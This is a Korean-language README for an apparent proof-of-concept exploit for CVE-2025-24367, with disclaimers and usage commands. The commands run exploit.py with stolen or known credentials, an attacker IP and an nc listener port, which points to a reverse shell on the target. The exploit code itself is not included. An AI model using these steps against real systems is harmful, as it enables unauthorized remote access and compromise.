
Proof of Concept for CVE-2025-24367
중요 — 먼저 읽으세요:
이 리포지토리와exploit.py는 교육 및 연구 목적으로만 제공됩니다. 명시적이고 서면으로 승인된 시스템, 네트워크 또는 서비스가 아니라면 이 코드를 사용하지 마십시오. 컴퓨터 시스템에 대한 무단 접근은 불법이며 비윤리적입니다. 이 코드를 사용함으로써 귀하는 관련 법률 및 기관 정책을 준수하는 데 동의하는 것입니다.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
스크립트를 실행하기 전에 nc 리스너가 실행 중인지 확인하세요. 디버깅이 아니라면 프록시 없이 스크립트를 실행하세요:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
최종 알림: 이 스크립트와 README는 교육용으로만 사용됩니다. 이러한 도구를 불법적으로 시스템에 접근하는 데 사용하지 마십시오.